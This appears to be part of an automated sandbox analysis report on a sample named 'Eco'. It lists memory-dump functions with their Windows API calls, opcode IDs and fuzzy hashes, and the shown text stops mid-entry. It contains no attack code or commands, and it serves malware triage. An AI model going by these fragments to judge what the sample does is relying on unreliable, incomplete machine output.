                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: de02f86a851e66dfa9ed8c1310383f8377e5c98c1d49402522c1cf3e1347975f
                          • Instruction ID: 9dc5c3d2bf22feae995c6992f29694fa501eba0d366d58cb6f4cea96e4897c37
                          • Opcode Fuzzy Hash: de02f86a851e66dfa9ed8c1310383f8377e5c98c1d49402522c1cf3e1347975f
                          • Instruction Fuzzy Hash: DB1190B215021DBEEF119F60CC85EEB7F5DFF48758F014115BB04A2090C6729C21DBA4
                          Function 00539C46 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                          Download Yara Rule
                          APIs
                          • __init_pointers.LIBCMT ref: 00539C46
                            • Part of subcall function 005332E9: EncodePointer.KERNEL32(00000000), ref: 005332EC
                            • Part of subcall function 005332E9: __initp_misc_winsig.LIBCMT ref: 00533307
                            • Part of subcall function 005332E9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0053A000
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0053A014
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0053A027
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0053A03A
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0053A04D
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0053A060
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0053A073
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0053A086
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0053A099
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0053A0AC
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0053A0BF
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0053A0D2
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0053A0E5
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0053A0F8
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0053A10B
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0053A11E
                          • __mtinitlocks.LIBCMT ref: 00539C4B
                          • __mtterm.LIBCMT ref: 00539C54
                            • Part of subcall function 00539CBC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539C59,00537E2D,005CB0B8,00000014), ref: 00539DB6
                            • Part of subcall function 00539CBC: _free.LIBCMT ref: 00539DBD
                            • Part of subcall function 00539CBC: DeleteCriticalSection.KERNEL32(0B],?,?,00539C59,00537E2D,005CB0B8,00000014), ref: 00539DDF
                          • __calloc_crt.LIBCMT ref: 00539C79
                          • __initptd.LIBCMT ref: 00539C9B
                          • GetCurrentThreadId.KERNEL32 ref: 00539CA2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: d6f82fc2a7bbe7911da4720722d20458fdc6cd8b0f92261163a70f66efcafb10
                          • Instruction ID: 989bc2808fd2a15b551983dd32c93df1e595a0e75558d28f6e1fd7f607f1f228
                          • Opcode Fuzzy Hash: d6f82fc2a7bbe7911da4720722d20458fdc6cd8b0f92261163a70f66efcafb10
                          • Instruction Fuzzy Hash: C9F06DB255971729EB3577797C0B79A3FD4BB82730F20162AF450C50D2EEE18C059251
                          Function 005340E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005341B2,?), ref: 00534103
                          • GetProcAddress.KERNEL32(00000000), ref: 0053410A
                          • EncodePointer.KERNEL32(00000000), ref: 00534116
                          • DecodePointer.KERNEL32(00000001,005341B2,?), ref: 00534133
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 3489934621-340411864
                          • Opcode ID: 66e257eb97fc2037d68f56566d30cf82f9c0c4b5fb499b1c42743e28ac9ad7f1
                          • Instruction ID: 70c5375f5133ab4412b73e214945b82d6594cd1e54dff9546a5c4712624dc70a
                          • Opcode Fuzzy Hash: 66e257eb97fc2037d68f56566d30cf82f9c0c4b5fb499b1c42743e28ac9ad7f1
                          • Instruction Fuzzy Hash: 3DE01AB06A1B00AFDF601FB0EC4DB593B64BB36B06F405826B451D52E0DBB5509CEF00
                          Function 005341BE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005340D8), ref: 005341D8
                          • GetProcAddress.KERNEL32(00000000), ref: 005341DF
                          • EncodePointer.KERNEL32(00000000), ref: 005341EA
                          • DecodePointer.KERNEL32(005340D8), ref: 00534205
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 3489934621-2819208100
                          • Opcode ID: 4f6df1d62895961bcccddd164720033c896817ed679d20fa2915b6166bc5812a
                          • Instruction ID: 1d279eb7dceedb497d58d7cd05037fbd5b9c303f38f52db3a2f11cd6aa3da6f7
                          • Opcode Fuzzy Hash: 4f6df1d62895961bcccddd164720033c896817ed679d20fa2915b6166bc5812a
                          • Instruction Fuzzy Hash: 60E09278562311ABDB609BA0AD0DB553FA4BB32746F109527F001E10E0CBB45588EE10
                          Function 0051218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 005121B8
                          • GetWindowRect.USER32(?,?), ref: 005121F9
                          • ScreenToClient.USER32(?,?), ref: 00512221
                          • GetClientRect.USER32(?,?), ref: 00512350
                          • GetWindowRect.USER32(?,?), ref: 00512369
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: fe0d80e171e907d837b88a4146e3539643a1495d07b13a8e5c3cffd76d3d49ec
                          • Instruction ID: bc27e4b9041bd628c4b6f55209a4b0c82df8ddedafcb47c4e10157530bc14eb3
                          • Opcode Fuzzy Hash: fe0d80e171e907d837b88a4146e3539643a1495d07b13a8e5c3cffd76d3d49ec
                          • Instruction Fuzzy Hash: AEB1A039900249DBEF10CFA8C4807EDBBB1FF48314F149529ED69EB254DB34A9A0DB65
                          Function 005768E0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          • API String ID: 3253778849-0
                          • Opcode ID: 269dcaf974729d605ebc68264c869d965c4932a2095ac1c25e852637bf5a6a5c
                          • Instruction ID: c2b2adc355c9637f578fdaf78c93a0459e8b65fff4234fca831e677fcc0b0a86
                          • Opcode Fuzzy Hash: 269dcaf974729d605ebc68264c869d965c4932a2095ac1c25e852637bf5a6a5c
                          • Instruction Fuzzy Hash: B361CD30500A5B9BDF11EF60D889EFE3FA8BF85308F048559F8596B2D2DB30A945DB50
                          Function 0059060C Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005906E5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590725
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590748
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00590771
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005907B4
                          • RegCloseKey.ADVAPI32(00000000), ref: 005907C1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          • API String ID: 4046560759-0
                          • Opcode ID: 6f482c5860f30d13bbe0e4a3f643d366df12d17795475d18714d179480d5606e
                          • Instruction ID: b89083d3f9fc202ee42f45b930a7694be36b2ef2ee4243054933c497e830d9af
                          • Opcode Fuzzy Hash: 6f482c5860f30d13bbe0e4a3f643d366df12d17795475d18714d179480d5606e
                          • Instruction Fuzzy Hash: 25516731208212AFCB14EB64D899E6BBBE8FF85320F00491DF595872A1DB31E905DB92
                          Function 00595B9E Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00595C00
                          • GetMenuItemCount.USER32(00000000), ref: 00595C37
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00595C5F
                          • GetMenuItemID.USER32(?,?), ref: 00595CCE
                          • GetSubMenu.USER32(?,?), ref: 00595CDC
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595D2D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: b94115715614c93fbc9e1d7b70e5c921463877620839149cfb9aefc91d8d588a
                          • Instruction ID: d2ebca317850978f3142761f29a2b8cf302f316aa8fc97ccc22658b02974ad02
                          • Opcode Fuzzy Hash: b94115715614c93fbc9e1d7b70e5c921463877620839149cfb9aefc91d8d588a
                          • Instruction Fuzzy Hash: BE518171A00616AFDF16EF64D849AAEBBB5FF88310F104459E901BB391DB70AE41DF90
                          Function 0056F46B Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0056F485
                          • VariantClear.OLEAUT32(00000013), ref: 0056F4F7
                          • VariantClear.OLEAUT32(00000000), ref: 0056F552
                          • _memmove.LIBCMT ref: 0056F57C
                          • VariantClear.OLEAUT32(?), ref: 0056F5C9
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F5F7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          • API String ID: 1101466143-0
                          • Opcode ID: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                          • Instruction ID: 1ea9cd73761d310dac5fc7f4ea2907a09b3340c17a831fca121747a308b4f6dc
                          • Opcode Fuzzy Hash: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                          • Instruction Fuzzy Hash: 4F514AB5A00209AFDB14CF58D884AAABBB8FF5D314F15856AE959DB340D730E911CFA0
                          Function 0057281D Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0057286B
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005728B6
                          • IsMenu.USER32(00000000), ref: 005728D6
                          • CreatePopupMenu.USER32 ref: 0057290A
                          • GetMenuItemCount.USER32(000000FF), ref: 00572968
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572999
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: 96dbc34cf48bb2329a6853179f8cba9853f1ae8952c03263bd966d57189ce367
                          • Instruction ID: 284c44105e8887b80906fc20275a2a139e05203b76725c0cca215a7da21f59cf
                          • Opcode Fuzzy Hash: 96dbc34cf48bb2329a6853179f8cba9853f1ae8952c03263bd966d57189ce367
                          • Instruction Fuzzy Hash: B051CF30A0020ADFDF24CF68E888BAEBFF5FF55314F188519E95997290D3709984EB61
                          Function 00511B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00511B76
                          • GetWindowRect.USER32(?,?), ref: 00511BDA
                          • ScreenToClient.USER32(?,?), ref: 00511BF7
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00511C08
                          • EndPaint.USER32(?,?), ref: 00511C52
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          • API String ID: 1827037458-0
                          • Opcode ID: ff6f75ee3f569e518993ee4ab2952b82742431547e9ecb78e80ee07c1fe9116b
                          • Instruction ID: bc07b956c40bd893c0e840fd44583adaed3c7f3f989dce6dbe727e66b38a1455
                          • Opcode Fuzzy Hash: ff6f75ee3f569e518993ee4ab2952b82742431547e9ecb78e80ee07c1fe9116b
                          • Instruction Fuzzy Hash: 8D418F701046019FE720DF24DC88BA67FF8FB59324F1406AAFA55872A1C7319889EB66
                          Function 0059BA8B Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(005D67B0,00000000,01235480,?,?,005D67B0,?,0059B995,?,?), ref: 0059BAFF
                          • EnableWindow.USER32(?,00000000), ref: 0059BB23
                          • ShowWindow.USER32(005D67B0,00000000,01235480,?,?,005D67B0,?,0059B995,?,?), ref: 0059BB83
                          • ShowWindow.USER32(?,00000004,?,0059B995,?,?), ref: 0059BB95
                          • EnableWindow.USER32(?,00000001), ref: 0059BBB9
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059BBDC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                          • Instruction ID: 37f14a1cdd114e1d2488009aef14cbea12252ed78b4477b0c91b68c15d60021e
                          • Opcode Fuzzy Hash: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                          • Instruction Fuzzy Hash: CB414F34600154AFFF25CF24D989BA47FE2FB16314F1881B9EA498F2E6C731A845CB51
                          Function 0058754D Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(?,?,?,?,?,?,005852F1,?,?,00000000,00000001), ref: 0058755B
                            • Part of subcall function 00583E50: GetWindowRect.USER32(?,?), ref: 00583E63
                          • GetDesktopWindow.USER32 ref: 00587585
                          • GetWindowRect.USER32(00000000), ref: 0058758C
                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005875BE
                            • Part of subcall function 0057566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005756E4
                          • GetCursorPos.USER32(?), ref: 005875EA
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587648
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                          • String ID:
                          • API String ID: 4137160315-0
                          • Opcode ID: 08adaad2eb382f3aa0e76b45f6bc01620d2948ccf46d0eefa4bd4871a69de7be
                          • Instruction ID: 4a262c49fd81da32441545ac9d3e5aee8b0ef0dbe8a6c7ff6518da21dd012706
                          • Opcode Fuzzy Hash: 08adaad2eb382f3aa0e76b45f6bc01620d2948ccf46d0eefa4bd4871a69de7be
                          • Instruction Fuzzy Hash: F531C672504309ABD720EF14DC49F5BBBE9FF89314F100919F989A7191DB70EA58CB92
                          Function 00569214 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00568AAA: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568AC1
                            • Part of subcall function 00568AAA: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568ACB
                            • Part of subcall function 00568AAA: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568ADA
                            • Part of subcall function 00568AAA: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568AE1
                            • Part of subcall function 00568AAA: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568AF7
                          • GetLengthSid.ADVAPI32(?,00000000,00568E30), ref: 00569265
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00569271
                          • HeapAlloc.KERNEL32(00000000), ref: 00569278
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00569291
                          • GetProcessHeap.KERNEL32(00000000,00000000,00568E30), ref: 005692A5
                          • HeapFree.KERNEL32(00000000), ref: 005692AC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                          • Instruction ID: 27fcdff7ccb8eceb35638689d9a22eed4cae02a157d92ff8cb31a9b556aad384
                          • Opcode Fuzzy Hash: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                          • Instruction Fuzzy Hash: 5911EB36610205FFDB108FA4CC18FBE7BACFB42315F508019F845A3250C732A944EB20
                          Function 00568FB2 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00568FE3
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00568FEA
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00568FF9
                          • CloseHandle.KERNEL32(00000004), ref: 00569004
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00569033
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00569047
                          Memory Dump Source
